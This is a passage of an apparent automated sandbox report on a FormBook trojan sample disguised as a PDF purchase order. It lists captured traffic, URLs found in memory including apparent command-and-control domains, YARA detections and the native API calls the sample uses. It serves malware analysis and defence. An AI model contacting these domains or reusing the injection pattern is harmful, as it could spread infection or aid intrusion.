ba 30 df 29 c3 89 ba ef bb 03 3c 3d 99 3f c6 e0 68 97 58 91 15 91 95 5b 88 9e fa aa 61 a2 8a f6 56 18 Data Ascii: 49fV6}~DAPIB+{EZ"G%)N/(R^mv _dv]<Vo-LhPbQ&+:>G7o6B6dFY*Y!e$C;<ipH25\G*:V9w1[VcT[=YbB&xr.~t`NS$+kyvV<NDuS[di9S%KEu-G4CM?RUm*4muZsiLW#Koa9W}3Z&T-a}){Dc'gallr-g.nGZtZM)SK=RiRu#)3U+j|`>uwGZ;aE!i<uz?
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:56:50 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 06:56:56 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/28903/search.png)
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006424000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003A04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://mocar.pro/prg5/?hH=OUWlBSduFOmbWHHx1
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1327157394.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006F22000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004502000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://stefanogaus.com/0rsk/?hH=VoD
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.Thesprinklesontop.com
Source: owYCvHvzfwuh.exe, 0000000D.00000002.3781878826.0000000004E2A000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.dxgsf.shop
Source: owYCvHvzfwuh.exe, 0000000D.00000002.3781878826.0000000004E2A000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.dxgsf.shop/vfca/
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.thesprinklesontop.com/Easy_Ice_Cream_Recipes.cfm?fp=M%2BtyRdDSGaZA523flChCSac4thPJjG%2FJW
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.thesprinklesontop.com/Ninja_Ice_Cream_Recipes.cfm?fp=M%2BtyRdDSGaZA523flChCSac4thPJjG%2FJ
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.thesprinklesontop.com/Nutella_Ice_Cream_Recipe.cfm?fp=M%2BtyRdDSGaZA523flChCSac4thPJjG%2F
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.thesprinklesontop.com/Quick_Chocolate_Ice_Cream_Recipe.cfm?fp=M%2BtyRdDSGaZA523flChCSac4t
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.thesprinklesontop.com/Recipe_for_Fried_Ice_Cream.cfm?fp=M%2BtyRdDSGaZA523flChCSac4thPJjG%
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.thesprinklesontop.com/__media__/design/underconstructionnotice.php?d=thesprinklesontop.co
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.thesprinklesontop.com/__media__/js/trademark.php?d=thesprinklesontop.com&type=ns
Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn.consentmanager.net
Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://delivery.consentmanager.net
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
Source: unregmp2.exe, 00000009.00000002.3778117405.0000000003078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: unregmp2.exe, 00000009.00000002.3778117405.0000000003078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: unregmp2.exe, 00000009.00000003.1722342341.0000000007F17000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: unregmp2.exe, 00000009.00000002.3778117405.0000000003078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: unregmp2.exe, 00000009.00000002.3778117405.000000000305B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: unregmp2.exe, 00000009.00000002.3778117405.0000000003078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: unregmp2.exe, 00000009.00000002.3778117405.000000000305B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://track.uc.cn/collect
Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: unregmp2.exe, 00000009.00000002.3780666012.0000000005DDC000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.00000000033BC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.ennerdaledevcons.co.uk/4ksh/?hH=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zECWK
Source: unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_0042B463 NtClose, 7_2_0042B463
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12B60 NtClose,LdrInitializeThunk, 7_2_01B12B60
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12DF0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_01B12DF0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12C70 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_01B12C70
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B135C0 NtCreateMutant,LdrInitializeThunk, 7_2_01B135C0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B14340 NtSetContextThread, 7_2_01B14340
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B14650 NtSuspendThread, 7_2_01B14650
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12BA0 NtEnumerateValueKey, 7_2_01B12BA0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12B80 NtQueryInformationFile, 7_2_01B12B80
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12BF0 NtAllocateVirtualMemory, 7_2_01B12BF0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12BE0 NtQueryValueKey, 7_2_01B12BE0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12AB0 NtWaitForSingleObject, 7_2_01B12AB0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12AF0 NtWriteFile, 7_2_01B12AF0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12AD0 NtReadFile, 7_2_01B12AD0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12DB0 NtEnumerateKey, 7_2_01B12DB0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12DD0 NtDelayExecution, 7_2_01B12DD0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12D30 NtUnmapViewOfSection, 7_2_01B12D30
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12D10 NtMapViewOfSection, 7_2_01B12D10
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12D00 NtSetInformationFile, 7_2_01B12D00
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12CA0 NtQueryInformationToken, 7_2_01B12CA0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12CF0 NtOpenProcess, 7_2_01B12CF0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12CC0 NtQueryVirtualMemory, 7_2_01B12CC0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12C00 NtQueryInformationProcess, 7_2_01B12C00
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12C60 NtCreateKey, 7_2_01B12C60
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12FB0 NtResumeThread, 7_2_01B12FB0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12FA0 NtQuerySection, 7_2_01B12FA0
